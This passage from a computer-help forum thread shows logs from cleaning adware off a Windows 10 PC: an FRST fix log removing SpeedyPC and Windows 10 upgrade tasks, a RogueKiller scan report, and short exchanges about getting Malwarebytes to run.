HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4D2E3B92-6CEE-4C6C-82C1-BF7C4B59FE7E} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4D2E3B92-6CEE-4C6C-82C1-BF7C4B59FE7E} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\systemmgr => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5840CBCE-7F77-411E-B033-1C1AF189ADB5} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5840CBCE-7F77-411E-B033-1C1AF189ADB5} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\1f308483-1a6e-493d-ae8f-5dd8634c5004-4 => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{69480AF7-F603-4EA8-8F93-EA6B8C01E138} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{69480AF7-F603-4EA8-8F93-EA6B8C01E138} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{766E1EC9-58D6-40FB-BAC5-6BD45B994FC5} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{766E1EC9-58D6-40FB-BAC5-6BD45B994FC5} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{89FF84C6-2FF3-4ADC-9311-2162837E1C22} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{89FF84C6-2FF3-4ADC-9311-2162837E1C22} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-URT => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{934CAF6C-AD19-40B5-8ACE-AC40D21BBF28} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{934CAF6C-AD19-40B5-8ACE-AC40D21BBF28} => key removed successfully
C:\WINDOWS\System32\Tasks\{0532BE32-87D9-B0CA-75BD-6DEE5839A94C} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0532BE32-87D9-B0CA-75BD-6DEE5839A94C} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A433E40E-B066-4216-A8FB-2E412069CE29} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A433E40E-B066-4216-A8FB-2E412069CE29} => key removed successfully
C:\WINDOWS\System32\Tasks\SpeedyBackup Startup => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SpeedyBackup Startup => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B1619F2B-5CE9-4EC5-A3E5-FD048FF487E4} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B1619F2B-5CE9-4EC5-A3E5-FD048FF487E4} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B7731159-01AA-4BAF-8508-D5D744AB61D2} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B7731159-01AA-4BAF-8508-D5D744AB61D2} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C6518B78-A01B-4FE6-8AF0-38C0BBF48E58} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6518B78-A01B-4FE6-8AF0-38C0BBF48E58} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SwiftSearch Auto Updater 1.10.0.25 Pending Update => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D6F2BC1F-773E-4624-9FAA-578BE389CD0E} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D6F2BC1F-773E-4624-9FAA-578BE389CD0E} => key removed successfully
C:\WINDOWS\System32\Tasks\SpeedyBackup reigistration schedule => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SpeedyBackup reigistration schedule => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E1DEA695-EE7F-4FB6-A4F0-EB278B1FD47B} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E1DEA695-EE7F-4FB6-A4F0-EB278B1FD47B} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E6542D06-DBEF-4690-A07E-F59316EEB423} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E6542D06-DBEF-4690-A07E-F59316EEB423} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F2EF1CA8-784E-427A-A1D4-97AEB2EB4A85} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F2EF1CA8-784E-427A-A1D4-97AEB2EB4A85} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FA4F0A0E-8234-469C-B0EB-2375D63F521A} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FA4F0A0E-8234-469C-B0EB-2375D63F521A} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Inst_Rep => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FFCE8EEA-7117-44A9-8BD4-0C6EA5CEE61E} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FFCE8EEA-7117-44A9-8BD4-0C6EA5CEE61E} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => key removed successfully
C:\WINDOWS\Tasks\NNKcNIsK9b1hl0VgyglYTRwSD.job => moved successfully
"C:\Users\Randy\AppData\Roaming\NNKcNIsK9b1hl0VgyglYTRwSD.exe" => not found.
C:\WINDOWS\Tasks\SpeedyPC Update Version3 Startup Task.job => moved successfully
"C:\Program Files (x86)\Common Files\SpeedyPC Software" => not found.
[2068] C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupService.exe => process closed successfully.
C:\Program Files (x86)\SpeedyPC Software => moved successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ CustomFolderNotSynced => key not found.
HKCR\CLSID\{4008A679-BE48-456D-A32E-97DE3F48E10D} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ CustomFolderSynced => key not found.
HKCR\CLSID\{4DD1429E-055B-4585-9E4D-614252FD7FC1} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FileNotSynced => key not found.
HKCR\CLSID\{267973DC-2B3C-41CE-93F1-D2C5CCC06663} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FileSynced => key not found.
HKCR\CLSID\{DBD42211-56CD-4C08-A3E4-48ED07AD7759} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderExcluded => key not found.
HKCR\CLSID\{43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderNotSynced => key not found.
HKCR\CLSID\{3E2576B1-5B08-47DE-8803-95C6ECA734EE} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderSynced => key not found.
HKCR\CLSID\{2858A960-566F-45CF-951E-4B3099E70E6F} => key not found.
HKLM\System\CurrentControlSet\Services\BackupService => key removed successfully
BackupService => service removed successfully
C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule.job => moved successfully
C:\WINDOWS\Tasks\SpeedyBackup Startup.job => moved successfully
"C:\WINDOWS\Tasks\SpeedyPC Update Version3 Startup Task.job" => not found.
C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule startup.job => moved successfully
C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule startup.job => not found.
C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule.job => not found.
C:\WINDOWS\Tasks\SpeedyBackup Startup.job => not found.

==== End of Fixlog 21:03:12 ====

 

[glhglh]

Mbam & RogueKiller still won't load.

 

[Broni]

Try to right click on installation file and then click "Run as an Administrator".

 

[glhglh]

Now we are making some progress. I know I did the administrative load yesterday and it didn't work. but did this time.
What is a beach kit?
RKill:

RogueKiller V12.9.7.0 (x64) [Feb 6 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 10 (10.0.10586) 64 bits version
Started in : Normal mode
User : Randy [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Delete -- Date : 02/12/2017 16:10:13 (Duration : 00:41:57)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 27 ¤¤¤
[PUP.Gen1] (X64) HKEY_CLASSES_ROOT\CLSID\{267973DC-2B3C-41CE-93F1-D2C5CCC06663} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) -> Not selected
[PUP.Gen1] (X64) HKEY_CLASSES_ROOT\CLSID\{2858A960-566F-45CF-951E-4B3099E70E6F} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) -> Not selected
[PUP.Gen1] (X64) HKEY_CLASSES_ROOT\CLSID\{3E2576B1-5B08-47DE-8803-95C6ECA734EE} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) -> Not selected
[PUP.Gen1] (X64) HKEY_CLASSES_ROOT\CLSID\{4008A679-BE48-456D-A32E-97DE3F48E10D} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) -> Not selected
[PUP.Gen1] (X64) HKEY_CLASSES_ROOT\CLSID\{43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) -> Not selected
[PUP.Gen1] (X64) HKEY_CLASSES_ROOT\CLSID\{4A28BE8C-F5D8-4300-ADD9-9C764381121B} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) -> Not selected
[PUP.Gen1] (X64) HKEY_CLASSES_ROOT\CLSID\{4DD1429E-055B-4585-9E4D-614252FD7FC1} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) -> Not selected
[PUP.Gen1] (X64) HKEY_CLASSES_ROOT\CLSID\{DBD42211-56CD-4C08-A3E4-48ED07AD7759} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) -> Not selected
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-2783097096-289569773-1546617986-1001\Software\SpeedyPC Software -> Not selected
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-2783097096-289569773-1546617986-1001\Software\SpeedyPC Software -> Not selected
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ CustomFolderNotSynced | (default) : {4008A679-BE48-456D-A32E-97DE3F48E10D} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ CustomFolderSynced | (default) : {4DD1429E-055B-4585-9E4D-614252FD7FC1} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FileNotSynced | (default) : {267973DC-2B3C-41CE-93F1-D2C5CCC06663} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FileSynced | (default) : {DBD42211-56CD-4C08-A3E4-48ED07AD7759} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderExcluded | (default) : {43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderNotSynced | (default) : {3E2576B1-5B08-47DE-8803-95C6ECA734EE} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderSynced | (default) : {2858A960-566F-45CF-951E-4B3099E70E6F} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ CustomFolderNotSynced | (default) : {4008A679-BE48-456D-A32E-97DE3F48E10D} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ CustomFolderSynced | (default) : {4DD1429E-055B-4585-9E4D-614252FD7FC1} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FileNotSynced | (default) : {267973DC-2B3C-41CE-93F1-D2C5CCC06663} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FileSynced | (default) : {DBD42211-56CD-4C08-A3E4-48ED07AD7759} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderExcluded | (default) : {43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderNotSynced | (default) : {3E2576B1-5B08-47DE-8803-95C6ECA734EE} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderSynced | (default) : {2858A960-566F-45CF-951E-4B3099E70E6F} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve -> Not selected
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve -> Not selected
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {F65943E6-3AF8-4E73-A7B3-0B0E5F88AA10} : v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Randy\AppData\Local\Temp\7zS377E\HP.EasyStart.exe|Name=HP EasyStart|Desc=Allow HP EasyStart| [x] -> Not selected

¤¤¤ Tasks : 1 ¤¤¤
[Suspicious.Path] \Beach Kit -- C:\Windows\system32\rundll32.exe ("C:\Users\Randy\AppData\Local\Beach Kit\{B29DDEDA-90AD-4218-7C20-9BC475FF709E}\BeachKit.dll",#3) -> Not selected

¤¤¤ Files : 2 ¤¤¤
[PUP.Filefinder][Folder] C:\Program Files (x86)\Pluto TV -> Deleted
[PUP.Filefinder][Folder] C:\Program Files (x86)\Pluto TV\locales -> Deleted
[Tr.Gen0][File] C:\Users\Randy\Pictures\adwcleaner_3.310.exe -> Deleted

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 2 ¤¤¤
[PUP.Gen2][Firefox:Addon] w1n6vmjf.default : Video Resumer [videoresumer@jetpack] -> Not selected
[PUP.Gen2][Firefox:Addon] w1n6vmjf.default : Yahoo Toolbar [{635abd67-4fe9-1b23-4f01-e679fa7484c1}] -> Not selected

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: Hitachi HTS547550A9E384 SATA Disk Device +++++
--- User ---
[MBR] 77fa1d858a8c63e6b064e2d9215b3df4
[BSP] b9ef7629f0ffd11443ea4d917c936735 : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 199 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 409600 | Size: 455991 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 934279168 | Size: 20645 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
3 - [XXXXXX] FAT32-LBA (0xc) [VISIBLE] Offset (sectors): 976560128 | Size: 103 MB
User = LL1 ... OK
User = LL2 ... OK

 

[glhglh]

Running mbam now.

 

[glhglh]

Actually, Mbam loaded, but when I try to update it, I get an error message: Program Error Updating Host not found.